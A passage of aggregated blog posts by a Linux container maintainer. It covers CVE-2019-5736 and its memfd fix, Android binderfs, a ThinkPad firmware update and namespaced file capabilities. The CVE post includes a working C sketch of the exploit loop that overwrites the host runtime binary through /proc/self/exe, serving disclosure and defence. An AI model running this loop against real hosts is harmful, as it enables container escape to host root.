Canonical Voices

What brauner's blog talks about

Christian Brauner

Runtimes And the Curse of the Privileged Container

Introduction (CVE-2019-5736)

Today, Monday, 2019-02-11, at 14:00:00 CET, CVE-2019-5736 was released:

The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command (it doesn’t matter if the command is not attacker-controlled) as root within a container in either of these contexts:

  • Creating a new container using an attacker-controlled image.
  • Attaching (docker exec) into an existing container which the attacker had previous write access to.

I’ve been working on a fix for this issue over the last couple of weeks together with Aleksa, a friend of mine and maintainer of runC. When he notified me about the issue in runC we tried to come up with an exploit for LXC as well and, though harder, it is doable. I was interested in the issue for technical reasons and figuring out how to reliably fix it was quite fun (with a proper dose of pure hatred). It also caused me to finally write down some personal thoughts I had for a long time about how we are running containers.

What are Privileged Containers?

At first glance this is a question that is probably trivial to anyone who has a decent low-level understanding of containers. Maybe even most users by now will know what a privileged container is. A first pass at defining it would be to say that a privileged container is a container that is owned by root. Looking closer this seems an insufficient definition. What about containers using user namespaces that are started as root? It seems we need to distinguish between what ids a container is running with. So we could say a privileged container is a container that is running as root. However, this is still wrong. Because “running as root” can either be seen as meaning “running as root as seen from the outside” or “running as root from the inside” where “outside” means “as seen from a task outside the container” and “inside” means “as seen from a task inside the container”.

What we really mean by a privileged container is a container where the semantics for id 0 are the same inside and outside of the container ceteris paribus. I say “ceteris paribus” because using LSMs, seccomp or any other security mechanism will not cause a change in the meaning of id 0 inside and outside the container. For example, a breakout caused by a bug in the runtime implementation will give you root access on the host.

An unprivileged container then simply is any container in which the semantics for id 0 inside the container are different from id 0 outside the container. For example, a breakout caused by a bug in the runtime implementation will not give you root access on the host by default. This should only be possible if the kernel’s user namespace implementation has a bug.

The reason why I like to define privileged containers this way is that it also lets us handle edge cases. Specifically, the case where a container is using a user namespace but a hole is punched into the idmapping at id 0 aka where id 0 is mapped through. Consider a container that uses the following idmappings:

id: 0 100000 100000

This instructs the kernel to setup the following mapping:

id: container_id(0) -> host_id(100000)
id: container_id(1) -> host_id(100001)
id: container_id(2) -> host_id(100002)
.
.
.

id: container_id(99999) -> host_id(199999)

With this mapping it’s evident that container_id(0) != host_id(0). But now consider the following mapping:

id: 0 0 1
id: 1 100001 99999

This instructs the kernel to setup the following mapping:

id: container_id(0) -> host_id(0)
id: container_id(1) -> host_id(100001)
id: container_id(2) -> host_id(100002)
.
.
.

container_id(99999) -> host_id(199999)

In contrast to the first example this has the consequence that container_id(0) == host_id(0). I would argue that any container that at least punches a hole for id 0 into its idmapping up to specifying an identity mapping is to be considered a privileged container.
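
As a sidenote on the mechanics, such idmappings are installed by writing the mapping lines - in the triplet format shown above, minus the id: prefix - to /proc/<pid>/uid_map (and analogously gid_map) of a process in the new user namespace. Here is a minimal sketch of that; the pid 1234 is made up for illustration:

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

static int write_idmap(pid_t pid, const char *map)
{
        char path[64];
        ssize_t len = strlen(map);
        int fd, ret;

        snprintf(path, sizeof(path), "/proc/%d/uid_map", (int)pid);

        fd = open(path, O_WRONLY | O_CLOEXEC);
        if (fd < 0)
                return -1;

        /* The kernel only accepts a single write() containing the full map. */
        ret = write(fd, map, len) == len ? 0 : -1;
        close(fd);
        return ret;
}

/* e.g. the second mapping from above: */
/* write_idmap(1234, "0 0 1\n1 100001 99999\n"); */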

As a sidenote, Docker containers run as privileged containers by default. There is usually some confusion here: people assume that because they do not use the --privileged flag their Docker containers run unprivileged. This is wrong. What the --privileged flag does is to give you even more permissions by e.g. not dropping (specific or even any) capabilities. One could say that such containers are almost “super-privileged”.

The Trouble with Privileged Containers

The problem I see with privileged containers is essentially captured by LXC’s and LXD’s upstream security position which we have held since at least 2015 but probably even earlier. I’m quoting from our notes about privileged containers:

Privileged containers are defined as any container where the container uid 0 is mapped to the host’s uid 0. In such containers, protection of the host and prevention of escape is entirely done through Mandatory Access Control (apparmor, selinux), seccomp filters, dropping of capabilities and namespaces.

Those technologies combined will typically prevent any accidental damage of the host, where damage is defined as things like reconfiguring host hardware, reconfiguring the host kernel or accessing the host filesystem.

LXC upstream’s position is that those containers aren’t and cannot be root-safe.

They are still valuable in an environment where you are running trusted workloads or where no untrusted task is running as root in the container.

We are aware of a number of exploits which will let you escape such containers and get full root privileges on the host. Some of those exploits can be trivially blocked and so we do update our different policies once made aware of them. Some others aren’t blockable as they would require blocking so many core features that the average container would become completely unusable.

[…]

As privileged containers are considered unsafe, we typically will not consider new container escape exploits to be security issues worthy of a CVE and quick fix. We will however try to mitigate those issues so that accidental damage to the host is prevented.

LXC’s upstream position for a long time has been that privileged containers are not and cannot be root safe. For something to be considered root safe it should be safe to hand root access to third parties or tasks.

Running Untrusted Workloads in Privileged Containers

is insane. That’s about everything that this paragraph should contain. The fact that the semantics for id 0 inside and outside the container are identical entails that any meaningful container escape will have the attacker gain root on the host.

CVE-2019-5736 Is a Very Very Very Bad Privilege Escalation to Host Root

CVE-2019-5736 is an excellent illustration of such an attack. Think about it: a process running inside a privileged container can rather trivially corrupt the binary that is used to attach to the container. This allows an attacker to create a custom ELF binary on the host. That binary could do anything it wants:

  • could just be a binary that calls poweroff
  • could be a binary that spawns a root shell
  • could be a binary that kills other containers when called again to attach
  • could be suid cat
  • .
  • .
  • .

The attack vector is actually slightly worse for runC due to its architecture. Since runC exits after spawning the container it can also be attacked through a malicious container image. That is super bad given that a lot of container workflows rely on downloading images from the web.

LXC cannot be attacked through a malicious image since the monitor process (a singleton per container) never exits during the container’s life cycle. Since the kernel does not allow modifications to running binaries it is not possible for the attacker to corrupt it. When the container is shutdown or killed the attacking task will be killed before it can do any harm. Only when the last process running inside the container has exited will the monitor itself exit. This has the consequence that if you run privileged OCI containers via our oci template with LXC you are not vulnerable to malicious images. Only the vector through the attaching binary still applies.

The Lie that Privileged Containers can be safe

Aside from mostly working on the kernel I’m also a maintainer of LXC and LXD alongside Stéphane Graber. We are responsible for LXC - the low-level container runtime - and LXD - the container management daemon using LXC. We have made a very conscious decision to consider privileged containers not root safe. Two main corollaries follow from this:

  1. Privileged containers should never be used to run untrusted workloads.
  2. Breakouts from privileged containers are not considered CVEs by our security policy.

It still seems a common belief that if we all just try hard enough using privileged containers for untrusted workloads is safe. This is not a promise that can be made good upon. A privileged container is not a security boundary. The reason for this is simply what we looked at above: container_id(0) == host_id(0). It is therefore deeply troubling that this industry is happy to let users believe that they are safe and secure using privileged containers.

Unprivileged Containers as Default

As upstream for LXC and LXD we have been advocating the use of unprivileged containers by default for years, way before anyone else did. Our low-level library LXC has supported unprivileged containers since 2013 when user namespaces were merged into the kernel. With LXD we have taken it one step further and made unprivileged containers the default and privileged containers opt-in for that very reason: privileged containers aren’t safe. We even allow you to have per-container idmappings to make sure that not just each container is isolated from the host but also all containers from each other.

For years we have been advocating for unprivileged containers at conferences, in blog posts, and whenever we have spoken to people, but somehow this whole industry has chosen to rely on privileged containers.

The good news is that we are seeing changes as people become more familiar with the perils of privileged containers. Let this recent CVE be another reminder that unprivileged containers need to be the default.

Are LXC and LXD affected?

I have seen this question asked all over the place so I guess I should add a section about this too:

  • Unprivileged LXC and LXD containers are not affected.

  • Any privileged LXC and LXD container running on a read-only rootfs is not affected.

  • Privileged LXC containers in the definition provided above are affected, though the attack is more difficult than for runC. The reason for this is that the lxc-attach binary does not exit before the program in the container has finished executing. This means an attacker would need to open an O_PATH file descriptor to /proc/self/exe, fork() itself into the background and re-open the O_PATH file descriptor through /proc/self/fd/<O_PATH-nr> in a loop as O_WRONLY and keep trying to write to the binary until such time as lxc-attach exits. Before that it will not succeed since the kernel will not allow modification of a running binary. (A sketch of this loop follows this list.)

  • Privileged LXD containers are only affected if the daemon is restarted other than for upgrade reasons. This should basically never happen. The LXD daemon never exits so any write will fail because the kernel does not allow modification of a running binary. If the LXD daemon is restarted because of an upgrade the binary will be swapped out and the file descriptor used for the attack will write to the old in-memory binary and not to the new binary.
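
For illustration, here is a minimal sketch of the loop described in the LXC bullet above. It assumes the attacker’s code runs in a context where /proc/self/exe refers to the host binary under attack, as in the published exploits for this CVE; error handling is trimmed and the payload is a harmless placeholder:

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
        const char payload[] = "#!/bin/sh\necho compromised\n";
        char path[64];
        int fd, wfd;

        /* Grab an O_PATH handle to the binary attaching to the container. */
        fd = open("/proc/self/exe", O_PATH | O_CLOEXEC);
        if (fd < 0)
                exit(EXIT_FAILURE);

        /* fork() into the background so the loop outlives the attach. */
        if (fork() != 0)
                exit(EXIT_SUCCESS);

        snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);

        /* Re-opening for writing fails with ETXTBSY as long as the binary
         * is running; keep trying until lxc-attach has exited. */
        for (;;) {
                wfd = open(path, O_WRONLY);
                if (wfd >= 0)
                        break;
                usleep(10000);
        }

        write(wfd, payload, sizeof(payload) - 1);
        close(wfd);
        exit(EXIT_SUCCESS);
}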

Chromebooks with Crostini using LXD are not affected

Chromebooks, which use LXD as their default container runtime, are not affected. First of all, all binaries reside on a read-only filesystem and, second, LXD does not allow running privileged containers on Chromebooks through the LXD_UNPRIVILEGED_ONLY flag.

Fixing CVE-2019-5736

To prevent this attack, LXC has been patched to create a temporary copy of the calling binary itself when it attaches to containers (cf. 6400238d08cdf1ca20d49bafb85f4e224348bf9d). To do this LXC can be instructed to create an anonymous, in-memory file using the memfd_create() system call and to copy itself into the temporary in-memory file, which is then sealed to prevent further modifications. LXC then executes this sealed, in-memory file instead of the original on-disk binary. Any compromising write operations from a privileged container to the host LXC binary will then write to the temporary in-memory binary and not to the host binary on-disk, preserving the integrity of the host LXC binary. And since the temporary, in-memory LXC binary is sealed, writes to it will also fail. To not break downstream users of the shared library this is opt-in by setting LXC_MEMFD_REXEC in the environment. For our lxc-attach binary, which is the only attack vector, this is now done by default.
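
The following is a minimal sketch of that trick - not LXC’s actual code, for which see the commit referenced above - assuming a kernel and libc with memfd_create() and file-sealing support (error handling is trimmed, and a robust version would loop around sendfile()):

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/stat.h>
#include <unistd.h>

static void reexec_sealed(char *argv[], char *envp[])
{
        struct stat st;
        int exe, mem;

        /* Create an anonymous, in-memory file that supports sealing. */
        mem = memfd_create("lxc-rexec", MFD_ALLOW_SEALING | MFD_CLOEXEC);
        exe = open("/proc/self/exe", O_RDONLY | O_CLOEXEC);
        if (mem < 0 || exe < 0 || fstat(exe, &st) < 0)
                exit(EXIT_FAILURE);

        /* Copy our own binary into the memfd... */
        if (sendfile(mem, exe, NULL, st.st_size) != st.st_size)
                exit(EXIT_FAILURE);

        /* ...and seal it so it cannot be modified anymore. */
        if (fcntl(mem, F_ADD_SEALS,
                  F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE | F_SEAL_SEAL) < 0)
                exit(EXIT_FAILURE);

        /* Execute the sealed in-memory copy instead of the on-disk binary. */
        fexecve(mem, argv, envp);
        exit(EXIT_FAILURE);
}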

Workloads that place the LXC binaries on a read-only filesystem or prevent running privileged containers can disable this feature by passing --disable-memfd-rexec during the configure stage when compiling LXC.

Christian Brauner

Android Binderfs


Introduction

Android Binder is an inter-process communication (IPC) mechanism. It is heavily used in all Android devices. The binder kernel driver has been present in the upstream Linux kernel for quite a while now.

Binder has been a controversial patchset (see this lwn article as an example). Its design was considered wrong and to violate certain core kernel design principles (e.g. a task should never touch another task’s file descriptor table). Most kernel developers were not a fan of binder.

Recently, the upstream binder code has fortunately been reworked significantly (e.g. it does not touch another task’s file descriptor table anymore, the locking is very fine-grained now, etc.).

With Android being one of the major operating systems (OS) for a vast number of devices there is simply no way around binder.

The Android Service Manager

The binder IPC mechanism is accessible from userspace through device nodes located at /dev. A modern Android system will allocate three device nodes:

  • /dev/binder
  • /dev/hwbinder
  • /dev/vndbinder

serving different purposes. However, the logic is the same for all three of them. A process can call open(2) on those device nodes to receive an fd which it can then use to issue requests via ioctl(2)s. Android has a service manager which is used to translate addresses to bus names and only the address of the service manager itself is well-known. The service manager is registered through an ioctl(2) and there can only be a single service manager. This means once a service manager has grabbed hold of binder devices they cannot be (easily) reused by a second service manager.
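
To make this concrete, here is a minimal sketch - assuming the uapi header linux/android/binder.h is installed - that opens a binder device and issues one of the simplest requests, BINDER_VERSION, which just asks the driver for its protocol version:

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/android/binder.h>

int main(void)
{
        struct binder_version version = { 0 };
        int fd;

        fd = open("/dev/binder", O_RDWR | O_CLOEXEC);
        if (fd < 0) {
                perror("open");
                return 1;
        }

        if (ioctl(fd, BINDER_VERSION, &version) < 0) {
                perror("ioctl");
                close(fd);
                return 1;
        }

        printf("binder protocol version: %d\n", version.protocol_version);
        close(fd);
        return 0;
}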

Running Android in Containers

This matters as soon as multiple instances of Android are supposed to be run, since they will all need their own private binder devices. This is a use-case that arises pretty naturally when running Android in system containers. People have been doing this for a long time with LXC. A project that has set out to make running Android in LXC containers very easy is Anbox. Anbox makes it possible to run hundreds of Android containers.

To properly run Android in a container it is necessary that each container has a set of private binder devices.

Statically Allocating binder Devices

Binder devices are currently statically allocated at compile time. Before compiling a kernel the CONFIG_ANDROID_BINDER_DEVICES option needs to be set in the kernel config (Kconfig) containing the names of the binder devices to allocate at boot. By default it is set as:

CONFIG_ANDROID_BINDER_DEVICES="binder,hwbinder,vndbinder"

To allocate additional binder devices the user needs to specify them with this Kconfig option. This is problematic since users need to know how many containers they will run at maximum and then to calculate the number of devices they need so they can specify them in the Kconfig. When the maximum number of needed binder devices changes after kernel compilation the only way to get additional devices is to recompile the kernel.

Problem 1: Using the misc major Device Number

This situation is aggravated by the fact that binder devices use the misc major number in the kernel. Each device node in the Linux kernel is identified by a major and minor number. A device can request its own major number. If it does it will have an exclusive range of minor numbers it doesn’t share with anything else and is free to hand out. Or it can use the misc major number. The misc major number is shared amongst different devices. However, that also means the number of minor devices that can be handed out is limited by all users of misc major. So if a user requests a very large number of binder devices in their Kconfig they might make it impossible for anyone else to allocate minor numbers. Or there simply might not be enough minor numbers left to allocate.

Problem 2: Containers and IPC namespaces

All of those binder devices requested in the Kconfig via CONFIG_ANDROID_BINDER_DEVICES will be allocated at boot and placed in the host’s devtmpfs mount usually located at /dev or - depending on the udev(7) implementation - will be created via mknod(2) by udev(7) at boot. That means all of those devices initially belong to the host IPC namespace. However, containers usually run in their own IPC namespace separate from the host’s. But when binder devices located in /dev are handed to containers (e.g. with a bind-mount) the kernel driver will not know that these devices are now used in a different IPC namespace since the driver is not IPC namespace aware. This is not a serious technical issue but a serious conceptual one. There should be a way to have per-IPC namespace binder devices.

Enter binderfs

To solve both problems we came up with a solution that I presented at the Linux Plumbers Conference in Vancouver this year. There’s a video of that presentation available on YouTube.

Android binderfs is a tiny filesystem that allows users to dynamically allocate binder devices, i.e. it allows one to add and remove binder devices at runtime. This means it solves problem 1. Additionally, binder devices located in a new binderfs instance are independent of binder devices located in another binderfs instance. All binder devices in binderfs instances are also independent of the binder devices allocated during boot specified in CONFIG_ANDROID_BINDER_DEVICES. This means binderfs solves problem 2.

Android binderfs can be mounted via:

mount -t binder binder /dev/binderfs

at which point a new instance of binderfs will show up at /dev/binderfs. In a fresh instance of binderfs no binder devices will be present. There will only be a binder-control device which serves as the request handler for binderfs:

root@edfu:~# ls -al /dev/binderfs/
total 0
drwxr-xr-x  2 root root      0 Jan 10 15:07 .
drwxr-xr-x 20 root root   4260 Jan 10 15:07 ..
crw-------  1 root root 242, 6 Jan 10 15:07 binder-control

binderfs: Dynamically Allocating a New binder Device

To allocate a new binder device in a binderfs instance a request needs to be sent through the binder-control device node. A request is sent in the form of an ioctl(2). Here’s an example program:

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/android/binder.h>
#include <linux/android/binderfs.h>

int main(int argc, char *argv[])
{
        int fd, ret, saved_errno;
        size_t len;
        struct binderfs_device device = { 0 };

        if (argc != 3)
                exit(EXIT_FAILURE);

        len = strlen(argv[2]);
        if (len > BINDERFS_MAX_NAME)
                exit(EXIT_FAILURE);

        memcpy(device.name, argv[2], len);

        fd = open(argv[1], O_RDONLY | O_CLOEXEC);
        if (fd < 0) {
                printf("%s - Failed to open binder-control device\n",
                       strerror(errno));
                exit(EXIT_FAILURE);
        }

        ret = ioctl(fd, BINDER_CTL_ADD, &device);
        saved_errno = errno;
        close(fd);
        errno = saved_errno;
        if (ret < 0) {
                printf("%s - Failed to allocate new binder device\n",
                       strerror(errno));
                exit(EXIT_FAILURE);
        }

        printf("Allocated new binder device with major %d, minor %d, and "
               "name %s\n", device.major, device.minor,
               device.name);

        exit(EXIT_SUCCESS);
}

What this program does is simply open the binder-control device node and send a BINDER_CTL_ADD request to the kernel. Users of binderfs need to tell the kernel which name the new binder device should get. By default a name can only contain up to 256 chars including the terminating zero byte. The struct which is used is:

/**
 * struct binderfs_device - retrieve information about a new binder device
 * @name:   the name to use for the new binderfs binder device
 * @major:  major number allocated for binderfs binder devices
 * @minor:  minor number allocated for the new binderfs binder device
 *
 */
struct binderfs_device {
       char name[BINDERFS_MAX_NAME + 1];
       __u32 major;
       __u32 minor;
};

and is defined in linux/android/binderfs.h. Once the request is made via an ioctl(2) passing a struct binderfs_device with the name to the kernel it will allocate a new binder device and return the major and minor number of the new device in the struct (this is necessary because binderfs allocates its major device number dynamically at boot). After the ioctl(2) returns there will be a new binder device located under /dev/binderfs with the chosen name:

root@edfu:~# ls -al /dev/binderfs/
total 0
drwxr-xr-x  2 root root      0 Jan 10 15:19 .
drwxr-xr-x 20 root root   4260 Jan 10 15:07 ..
crw-------  1 root root 242, 0 Jan 10 15:19 binder-control
crw-------  1 root root 242, 1 Jan 10 15:19 my-binder
crw-------  1 root root 242, 2 Jan 10 15:19 my-binder1

binderfs: Deleting a binder Device

Deleting binder devices does not involve issuing another ioctl(2) request through binder-control. They can be deleted via unlink(2). This means that the rm(1) tool can be used to delete them:

root@edfu:~# rm /dev/binderfs/my-binder1
root@edfu:~# ls -al /dev/binderfs/
total 0
drwxr-xr-x  2 root root      0 Jan 10 15:19 .
drwxr-xr-x 20 root root   4260 Jan 10 15:07 ..
crw-------  1 root root 242, 0 Jan 10 15:19 binder-control
crw-------  1 root root 242, 1 Jan 10 15:19 my-binder

Note that the binder-control device cannot be deleted since this would make the binderfs instance unusable. The binder-control device will be deleted when the binderfs instance is unmounted and all references to it have been dropped.

binderfs: Mounting Multiple Instances

Mounting another binderfs instance at a different location will create a new and separate instance from all other binderfs mounts. This is identical to the behavior of devpts, tmpfs, and also - even though never merged in the kernel - kdbusfs:

root@edfu:~# mkdir binderfs1
root@edfu:~# mount -t binder binder binderfs1
root@edfu:~# ls -al binderfs1/
total 4
drwxr-xr-x  2 root   root        0 Jan 10 15:23 .
drwxr-xr-x 72 ubuntu ubuntu   4096 Jan 10 15:23 ..
crw-------  1 root   root   242, 2 Jan 10 15:23 binder-control

There is no my-binder device in this new binderfs instance since its devices are not related to those in the binderfs instance at /dev/binderfs. This means users can easily get their private set of binder devices.

binderfs: Mounting binderfs in User Namespaces

The Android binderfs filesystem can be mounted and used to allocate new binder devices in user namespaces. This has the advantage that binderfs can be used in unprivileged containers or any user-namespace-based sandboxing solution:

ubuntu@edfu:~$ unshare --user --map-root --mount
root@edfu:~# mkdir binderfs-userns
root@edfu:~# mount -t binder binder binderfs-userns/
root@edfu:~# # The "bfs" binary used here is the compiled program from above
root@edfu:~# ./bfs binderfs-userns/binder-control my-user-binder
Allocated new binder device with major 242, minor 4, and name my-user-binder
root@edfu:~# ls -al binderfs-userns/
total 4
drwxr-xr-x  2 root root      0 Jan 10 15:34 .
drwxr-xr-x 73 root root   4096 Jan 10 15:32 ..
crw-------  1 root root 242, 3 Jan 10 15:34 binder-control
crw-------  1 root root 242, 4 Jan 10 15:36 my-user-binder

Kernel Patchsets

The binderfs patchset is merged upstream and will be available when Linux 5.0 gets released. There are a few outstanding patches that are currently waiting in Greg’s char-misc-linus tree (cf. “binderfs: remove wrong kern_mount() call” and “binderfs: make each binderfs mount a new instance”) and some others are queued for the 5.1 merge window. But overall it seems to be in decent shape.

Read more
Christian Brauner

Today a new firmware update enabled the long-missing S3 support for the 6th generation Lenovo ThinkPad X1 Carbon. After getting the new update via:

sudo fwupdmgr refresh
sudo fwupdmgr get-updates

You should see:

20KHCTO1WW System Firmware has firmware updates:
GUID:                    a4b51dca-8f97-4310-8821-3330f83c9135
GUID:                    230c8b18-8d9b-53ec-838b-6cfc0383493a
ID:                      com.lenovo.ThinkPadN23ET.firmware
Update Version:          0.1.30
Update Name:             ThinkPad X1 Carbon 6th
Update Summary:          Lenovo ThinkPad X1 Carbon 6th System Firmware
Update Remote ID:        lvfs
Update Checksum:         SHA1(1a528d1b227e500bcaedbd4c7026a477c5f4a5ca)
Update Location:         https://fwupd.org/downloads/7bd315afb8ff3a610474b752265e7703e6bf1d5e-Lenovo-ThinkPad-X1Carbon6th-SystemFirmware-1.30.cab
Update Description:      Lenovo ThinkPad X1 Carbon 6th System Firmware
                         
                         CHANGES IN THIS RELEASE
                         
                         Version 1.30
                         
                         [Important updates]
                          • Nothing.
                         
                         [New functions or enhancements]
                          • Support Optimized Sleep State for Linux in ThinkPad Setup - Config - Power.
                          • (Note) "Linux"option is optimized for Linux OS, Windows user must select
                          • "Windows 10" option
                         
                         [Problem fixes]
                          • Nothing.

After installing the update via:

sudo fwupdmgr update

S3 will still not be enabled. To enable it fully you must enter the BIOS on boot and switch the new Sleep State option under Config - Power from "Windows 10" to "Linux".

Then

dmesg | grep S3

should show

[    0.236226] ACPI: (supports S0 S3 S4 S5)

Christian

Christian Brauner

Unprivileged File Capabilities


Introduction

File capabilities (fcaps) are capabilities associated with - well - files, usually a binary. They can be used to temporarily elevate privileges for unprivileged users in order to accomplish a privileged task. This allows various tools to drop the dangerous setuid (suid) or setgid (sgid) bits in favor of fcaps.

While fcaps have been supported since Linux 2.6.24 they could, until recently, only be set in the initial user namespace. Had root in a non-initial user namespace been allowed to set them, any unprivileged user on the host would have been able to map their own uid to root in a new user namespace, set fcaps that would grant more privileges to them, and then execute the binary with elevated privileges on the host. This also means that until recently it was not safe to use fcaps in unprivileged containers, i.e. containers using user namespaces. The good news is that starting with Linux kernel version 4.14 it is possible to set fcaps in user namespaces.

Kernel Patchset

The patchset to enable this has been contributed by Serge Hallyn, a co-maintainer and core developer of the LXD and LXC projects:

commit 8db6c34f1dbc8e06aa016a9b829b06902c3e1340
Author: Serge E. Hallyn <serge@hallyn.com>
Date:   Mon May 8 13:11:56 2017 -0500

    Introduce v3 namespaced file capabilities

LXD Now Preserves File Capabilities In User Namespaces

In parallel to the kernel patchset we have now enabled LXD to preserve fcaps in user namespaces. This means if your kernel supports namespaced fcaps LXD will preserve them whenever unprivileged containers are created, or when their idmapping is changed. No matter if you go from privileged to unprivileged or the other way around, your filesystem capabilities will be right there with you. In other news, there is now little to no use for the suid and sgid bits even in unprivileged containers.

This is something that the Linux Containers Project has wanted for a long time and we are happy that we are the first runtime to fully support this feature.

If all of the above either makes no sense to you or you’re asking yourself what is so great about this because some distros have been using fcaps for a long time don’t worry we’ll try to shed some light on all of this.

The dark ages: suid and sgid binaries

Not too long ago the suid and sgid bits were the only well-known mechanism to temporarily grant elevated privileges to unprivileged users executing a binary. At one point some or all of the following binaries were suid or sgid binaries on most distros:

  • ping
  • newgidmap
  • newuidmap
  • mtr-packet

The binary that most developers will have already used is the ping binary. It’s convenient to just check whether a connection to the internet has been established successfully by pinging a random website. It’s such a common tool that most people don’t even think about it needing any sort of privilege. In fact it does require privileges. ping wants to open sockets of type SOCK_RAW but the kernel prevents unprivileged users from using sockets of type SOCK_RAW because it would allow them to e.g. send ICMP packets directly. But ping seems like a binary that is useful to unprivileged users as well as safe. Short of a better mechanism the most obvious choice is to have it be owned by uid 0 and set the suid bit.
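
This restriction is easy to demonstrate. The following minimal sketch will report “Operation not permitted” when run by a user without CAP_NET_RAW:

#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

int main(void)
{
        /* SOCK_RAW requires CAP_NET_RAW; unprivileged callers get EPERM. */
        int fd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
        if (fd < 0)
                printf("socket(SOCK_RAW): %s\n", strerror(errno));
        else
                printf("raw socket created, fd %d\n", fd);
        return 0;
}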

chb@conventiont|~
> perms /bin/ping
-rwsr-xr-x 4755 /bin/ping

You can see the little s in the permissions. This indicates that this version of ping has the suid bit set. Hence, if called it will run as uid 0 independent of the uid of the caller. In short, if my user has uid 1000 and calls the ping binary ping will still run with uid 0.

While the suid mechanism gets the job done it is also wildly inappropriate. ping does need elevated privileges in one specific area. But by setting the suid bit and having ping be owned by uid 0 we’re granting it all kinds of privileges, in fact all privileges. If there ever is a major security sensitive bug in a suid binary it is trivial for anyone to exploit the fact that it runs as uid 0.

Of course, the kernel has all kinds of security mechanisms to deflate the impact of the suid and sgid bits. If you strace an suid binary the suid bit will be stripped, there are complex rules regarding execve()ing a binary that has the suid bit set, and the suid bit is also dropped when the owner of the binary in question changes, i.e. when you call chown() on it. Still these are all mitigations for something that is inherently dangerous because it grants too much for too little gain. It’s like someone asking for a little sugar and you handing out the key to your house. To quote Eric:

Frankly being able to raise the priveleges of an existing process is such a dangerous mechanism and so limiting on system design that I wish someone would care, and remove all suid, sgid, and capabilities use from a distro. It is hard to count how many neat new features have been shelved because of the requirement to support suid root executables.

Capabilities and File Capabilities

This is where capabilities come into play [1]. Capabilities start from the idea that the root privilege could as well be split into subsets of privileges. Whenever something requests to perform an operation that requires privileges it doesn’t have we can grant it a very specific subset instead of all privileges at once [2]. For example, the ping binary would only need the CAP_NET_RAW capability because it is the capability that regulates whether a process can open SOCK_RAW sockets.

Capabilities are associated with processes and files. Granted, Linux capabilities are not the cleanest or easiest concept to grasp. But I’ll try to shed some light. In essence, capabilities can be present in four different types of sets. The kernel performs checks against a process by looking at its effective capability set, i.e. the capabilities the process has at the time of trying to perform the operation. The rest of the capability sets are (glossing over details now for the sake of brevity) basically used for calculating each other including the effective capability set. There are permitted capabilities, i.e. the capabilities a process is allowed to raise in the effective set, inheritable capabilities, i.e. capabilities that should be (but are only under certain restricted conditions) preserved across an execve(), and ambient capabilities that are there to fix the shortcomings of inheritable capabilities, i.e. they are there to allow unprivileged processes to preserve capabilities across an execve() call [3]. Last but not least we have file capabilities, i.e. capabilities that are attached to a file. When such a file is execve()ed the associated fcaps are taken into account when calculating the permissions after the execve().
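
To get a feeling for these sets, here is a small sketch - assuming libcap, linked with -lcap - that prints the calling process’s capability sets in the same textual format used by tools like getcap and capsh:

#include <stdio.h>
#include <stdlib.h>
#include <sys/capability.h>

int main(void)
{
        cap_t caps;
        char *text;

        /* Fetch the effective, permitted, and inheritable sets. */
        caps = cap_get_proc();
        if (!caps)
                exit(EXIT_FAILURE);

        /* Render them as text, e.g. "= cap_net_raw+ep". */
        text = cap_to_text(caps, NULL);
        if (!text) {
                cap_free(caps);
                exit(EXIT_FAILURE);
        }

        printf("%s\n", text);

        cap_free(text);
        cap_free(caps);
        exit(EXIT_SUCCESS);
}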

Extended attributes and File Capabilities

The part most users are confused about is how capabilities get associated with files. This is where extended attributes (xattr) come into play. xattrs are <key>:<value> pairs that can be associated with files. They are stored on-disk as part of the metadata of a file. The <key> of an xattr will always be a string identifying the attribute in question whereas the <value> can be arbitrary data, i.e. it can be another string or binary data. Note that it is not guaranteed nor required by the kernel that a filesystem supports xattrs. The virtual filesystem (vfs) will handle all core permission checks, i.e. it will verify that the caller is allowed to set the requested xattr, but the actual operation of writing out the xattr on disk will be left to the filesystem. Without going into the specifics the callchain currently is:

SYSCALL_DEFINE5(setxattr, const char __user *, pathname,
                const char __user *, name, const void __user *, value,
                size_t, size, int, flags)
|
-> static int path_setxattr(const char __user *pathname,
                            const char __user *name, const void __user *value,
                            size_t size, int flags, unsigned int lookup_flags)
   |
   -> static long setxattr(struct dentry *d, const char __user *name,
                           const void __user *value, size_t size, int flags)
      |
      -> int vfs_setxattr(struct dentry *dentry, const char *name,
                          const void *value, size_t size, int flags)
         |
         -> int __vfs_setxattr_noperm(struct dentry *dentry, const char *name,
                                      const void *value, size_t size, int flags)

and finally __vfs_setxattr_noperm() will call

int __vfs_setxattr(struct dentry *dentry, struct inode *inode, const char *name,
                   const void *value, size_t size, int flags)
{
        const struct xattr_handler *handler;

        handler = xattr_resolve_name(inode, &name);
        if (IS_ERR(handler))
                return PTR_ERR(handler);
        if (!handler->set)
                return -EOPNOTSUPP;
        if (size == 0)
                value = "";  /* empty EA, do not remove */
        return handler->set(handler, dentry, inode, name, value, size, flags);
}

The __vfs_setxattr() function will then call xattr_resolve_name() which will find and return the appropriate handler for the xattr in the struct xattr_handler list of the corresponding filesystem. If the filesystem has a handler for the xattr in question it will return it and the attribute will be set; if not, EOPNOTSUPP will be surfaced to the caller.
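
From userspace this machinery is reached through the setxattr(2)/getxattr(2) family of system calls. Here is a minimal sketch storing and reading back an attribute in the user. namespace; the scratch path is made up, and the filesystem it lives on must have a handler for user. xattrs or you will see exactly the EOPNOTSUPP case just described:

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/xattr.h>
#include <unistd.h>

int main(void)
{
        const char *path = "./xattr-demo";
        char value[64] = { 0 };
        ssize_t len;
        int fd;

        /* Create a scratch file to attach the xattr to. */
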